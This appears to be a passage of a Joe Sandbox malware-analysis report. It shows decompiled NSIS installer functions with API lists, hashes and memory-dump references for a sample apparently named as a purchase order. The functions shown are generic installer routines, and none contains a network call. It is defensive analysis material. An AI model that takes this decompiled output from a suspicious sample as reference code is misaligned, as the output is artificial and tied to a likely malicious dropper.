                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00401D57() {
                                                                      				void* _t18;
                                                                      				struct HINSTANCE__* _t22;
                                                                      				struct HWND__* _t25;
                                                                      				void* _t27;
                                                                      
                                                                      				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                                                      				GetClientRect(_t25, _t27 - 0x58);
                                                                      				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                      				if(_t18 != _t22) {
                                                                      					DeleteObject(_t18);
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t27 - 4));
                                                                      				return 0;
                                                                      			}







                                                                      0x00401d63
                                                                      0x00401d6a
                                                                      0x00401d99
                                                                      0x00401da1
                                                                      0x00401da8
                                                                      0x00401da8
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                      • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                      • Opcode Fuzzy Hash: 1cce6cf5ba1aed4fa5ce4547bc0ae4b149cf4eb258e4777d2c59333f9832c14c
                                                                      • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E00401C19(intOrPtr __edx) {
                                                                      				int _t29;
                                                                      				long _t30;
                                                                      				signed int _t32;
                                                                      				WCHAR* _t35;
                                                                      				long _t36;
                                                                      				int _t41;
                                                                      				signed int _t42;
                                                                      				int _t46;
                                                                      				int _t56;
                                                                      				intOrPtr _t57;
                                                                      				struct HWND__* _t61;
                                                                      				void* _t64;
                                                                      
                                                                      				_t57 = __edx;
                                                                      				_t29 = E00402C15(3);
                                                                      				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                      				 *(_t64 - 0x10) = _t29;
                                                                      				_t30 = E00402C15(4);
                                                                      				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                      				 *(_t64 + 8) = _t30;
                                                                      				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                      					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
                                                                      				}
                                                                      				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                      				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                      					 *(_t64 + 8) = E00402C37(0x44);
                                                                      				}
                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                      				_push(1);
                                                                      				if(__eflags != 0) {
                                                                      					_t59 = E00402C37();
                                                                      					_t32 = E00402C37();
                                                                      					asm("sbb ecx, ecx");
                                                                      					asm("sbb eax, eax");
                                                                      					_t35 =  ~( *_t31) & _t59;
                                                                      					__eflags = _t35;
                                                                      					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                      					goto L10;
                                                                      				} else {
                                                                      					_t61 = E00402C15();
                                                                      					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                      					_t41 = E00402C15(2);
                                                                      					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                      					_t56 =  *(_t64 - 0x14) >> 2;
                                                                      					if(__eflags == 0) {
                                                                      						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                                      						L10:
                                                                      						 *(_t64 - 0x30) = _t36;
                                                                      					} else {
                                                                      						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                                      						asm("sbb eax, eax");
                                                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                      					}
                                                                      				}
                                                                      				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                      				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                      					_push( *(_t64 - 0x30));
                                                                      					E004062F7();
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                      				return 0;
                                                                      			}















                                                                      0x00401c19
                                                                      0x00401c1b
                                                                      0x00401c22
                                                                      0x00401c25
                                                                      0x00401c28
                                                                      0x00401c32
                                                                      0x00401c36
                                                                      0x00401c39
                                                                      0x00401c42
                                                                      0x00401c42
                                                                      0x00401c45
                                                                      0x00401c49
                                                                      0x00401c52
                                                                      0x00401c52
                                                                      0x00401c55
                                                                      0x00401c59
                                                                      0x00401c5b
                                                                      0x00401cb0
                                                                      0x00401cb2
                                                                      0x00401cbd
                                                                      0x00401cc7
                                                                      0x00401cca
                                                                      0x00401cca
                                                                      0x00401cd3
                                                                      0x00000000
                                                                      0x00401c5d
                                                                      0x00401c64
                                                                      0x00401c66
                                                                      0x00401c69
                                                                      0x00401c6f
                                                                      0x00401c76
                                                                      0x00401c79
                                                                      0x00401ca1
                                                                      0x00401cd9
                                                                      0x00401cd9
                                                                      0x00401c7b
                                                                      0x00401c89
                                                                      0x00401c91
                                                                      0x00401c94
                                                                      0x00401c94
                                                                      0x00401c79
                                                                      0x00401cdc
                                                                      0x00401cdf
                                                                      0x00401ce5
                                                                      0x00402a65
                                                                      0x00402a65
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                      • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                      • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                      • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
                                                                      				void* _t20;
                                                                      				void* _t21;
                                                                      				int _t24;
                                                                      				char _t27;
                                                                      				int _t30;
                                                                      				void* _t32;
                                                                      				intOrPtr _t33;
                                                                      				void* _t34;
                                                                      				intOrPtr _t37;
                                                                      				void* _t39;
                                                                      				void* _t42;
                                                                      
                                                                      				_t33 = __edx;
                                                                      				_t30 = __ebx;
                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                                                      				_t34 = __eax;
                                                                      				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                                                      				 *(_t39 - 0x3c) = E00402C37(2);
                                                                      				_t20 = E00402C37(0x11);
                                                                      				 *(_t39 - 4) = 1;
                                                                      				_t21 = E00402CC7(_t42, _t34, _t20, 2);
                                                                      				 *(_t39 + 8) = _t21;
                                                                      				if(_t21 != __ebx) {
                                                                      					_t24 = 0;
                                                                      					if(_t37 == 1) {
                                                                      						E00402C37(0x23);
                                                                      						_t24 = lstrlenW(0x40b5d8) + _t29 + 2;
                                                                      					}
                                                                      					if(_t37 == 4) {
                                                                      						_t27 = E00402C15(3);
                                                                      						_pop(_t32);
                                                                      						 *0x40b5d8 = _t27;
                                                                      						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                                                      						_t24 = _t37;
                                                                      					}
                                                                      					if(_t37 == 3) {
                                                                      						_t24 = E004031BA(_t32,  *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d8, 0x1800);
                                                                      					}
                                                                      					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d8, _t24) == 0) {
                                                                      						 *(_t39 - 4) = _t30;
                                                                      					}
                                                                      					_push( *(_t39 + 8));
                                                                      					RegCloseKey();
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                      				return 0;
                                                                      			}














                                                                      0x004023de
                                                                      0x004023de
                                                                      0x004023de
                                                                      0x004023e1
                                                                      0x004023e8
                                                                      0x004023f2
                                                                      0x004023f5
                                                                      0x004023fe
                                                                      0x00402405
                                                                      0x0040240c
                                                                      0x0040240f
                                                                      0x00402415
                                                                      0x0040241f
                                                                      0x00402423
                                                                      0x0040242e
                                                                      0x0040242e
                                                                      0x00402435
                                                                      0x00402439
                                                                      0x0040243e
                                                                      0x0040243f
                                                                      0x00402445
                                                                      0x00402448
                                                                      0x00402448
                                                                      0x0040244c
                                                                      0x00402458
                                                                      0x00402458
                                                                      0x00402471
                                                                      0x00402473
                                                                      0x00402473
                                                                      0x00402476
                                                                      0x00402551
                                                                      0x00402551
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh409.tmp,00000023,00000011,00000002), ref: 00402429
                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh409.tmp,00000000,00000011,00000002), ref: 00402469
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh409.tmp,00000000,00000011,00000002), ref: 00402551
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsh409.tmp
                                                                      • API String ID: 2655323295-2343392866
                                                                      • Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                      • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                      • Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                      • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E00405C81(WCHAR* _a4) {
                                                                      				WCHAR* _t9;
                                                                      
                                                                      				_t9 = _a4;
                                                                      				_push( &(_t9[lstrlenW(_t9)]));
                                                                      				_push(_t9);
                                                                      				if( *(CharPrevW()) != 0x5c) {
                                                                      					lstrcatW(_t9, 0x40a014);
                                                                      				}
                                                                      				return _t9;
                                                                      			}




                                                                      0x00405c82
                                                                      0x00405c8f
                                                                      0x00405c90
                                                                      0x00405c9b
                                                                      0x00405ca3
                                                                      0x00405ca3
                                                                      0x00405cab

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75703420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA3
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3355392842
                                                                      • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                      • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                      • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                      • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00405D89(void* __eflags, intOrPtr _a4) {
                                                                      				int _t11;
                                                                      				signed char* _t12;
                                                                      				intOrPtr _t18;
                                                                      				intOrPtr* _t21;
                                                                      				signed int _t23;
                                                                      
                                                                      				E004063B0(0x425f30, _a4);
                                                                      				_t21 = E00405D2C(0x425f30);
                                                                      				if(_t21 != 0) {
                                                                      					E00406644(_t21);
                                                                      					if(( *0x42a25c & 0x00000080) == 0) {
                                                                      						L5:
                                                                      						_t23 = _t21 - 0x425f30 >> 1;
                                                                      						while(1) {
                                                                      							_t11 = lstrlenW(0x425f30);
                                                                      							_push(0x425f30);
                                                                      							if(_t11 <= _t23) {
                                                                      								break;
                                                                      							}
                                                                      							_t12 = E004066F3();
                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                      								E00405CCD(0x425f30);
                                                                      								continue;
                                                                      							} else {
                                                                      								goto L1;
                                                                      							}
                                                                      						}
                                                                      						E00405C81();
                                                                      						return 0 | GetFileAttributesW(??) != 0xffffffff;
                                                                      					}
                                                                      					_t18 =  *_t21;
                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                      						goto L1;
                                                                      					} else {
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      				L1:
                                                                      				return 0;
                                                                      			}








                                                                      0x00405d95
                                                                      0x00405da0
                                                                      0x00405da4
                                                                      0x00405dab
                                                                      0x00405db7
                                                                      0x00405dc7
                                                                      0x00405dc9
                                                                      0x00405de1
                                                                      0x00405de2
                                                                      0x00405de9
                                                                      0x00405dea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dcd
                                                                      0x00405dd4
                                                                      0x00405ddc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dd4
                                                                      0x00405dec
                                                                      0x00000000
                                                                      0x00405e00
                                                                      0x00405db9
                                                                      0x00405dbf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dbf
                                                                      0x00405da6
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75702EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75702EE0,00000000), ref: 00405D3A
                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75702EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75702EE0,00000000), ref: 00405DE2
                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75702EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75702EE0), ref: 00405DF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: 0_B
                                                                      • API String ID: 3248276644-2128305573
                                                                      • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                      • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                      • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                      • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405995(WCHAR* _a4) {
                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                      				int _t7;
                                                                      
                                                                      				0x426730->cb = 0x44;
                                                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20);
                                                                      				if(_t7 != 0) {
                                                                      					CloseHandle(_v20.hThread);
                                                                      					return _v20.hProcess;
                                                                      				}
                                                                      				return _t7;
                                                                      			}





                                                                      0x0040599e
                                                                      0x004059be
                                                                      0x004059c6
                                                                      0x004059cb
                                                                      0x00000000
                                                                      0x004059d1
                                                                      0x004059d5

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                      • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004059A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                      • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                      • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00403A29() {
                                                                      				void* _t2;
                                                                      				void* _t3;
                                                                      				void* _t6;
                                                                      				void* _t8;
                                                                      
                                                                      				_t8 =  *0x4216ec;
                                                                      				_t3 = E00403A0E(_t2, 0);
                                                                      				if(_t8 != 0) {
                                                                      					do {
                                                                      						_t6 = _t8;
                                                                      						_t8 =  *_t8;
                                                                      						FreeLibrary( *(_t6 + 8));
                                                                      						_t3 = GlobalFree(_t6);
                                                                      					} while (_t8 != 0);
                                                                      				}
                                                                      				 *0x4216ec =  *0x4216ec & 0x00000000;
                                                                      				return _t3;
                                                                      			}







                                                                      0x00403a2a
                                                                      0x00403a32
                                                                      0x00403a39
                                                                      0x00403a3c
                                                                      0x00403a3c
                                                                      0x00403a3e
                                                                      0x00403a43
                                                                      0x00403a4a
                                                                      0x00403a50
                                                                      0x00403a54
                                                                      0x00403a55
                                                                      0x00403a5d

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75702EE0,00403A00,75703420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                      • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-3355392842
                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                      • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                      • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                      • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00405CCD(WCHAR* _a4) {
                                                                      				WCHAR* _t5;
                                                                      				WCHAR* _t7;
                                                                      
                                                                      				_t7 = _a4;
                                                                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                      				while( *_t5 != 0x5c) {
                                                                      					_push(_t5);
                                                                      					_push(_t7);
                                                                      					_t5 = CharPrevW();
                                                                      					if(_t5 > _t7) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				 *_t5 =  *_t5 & 0x00000000;
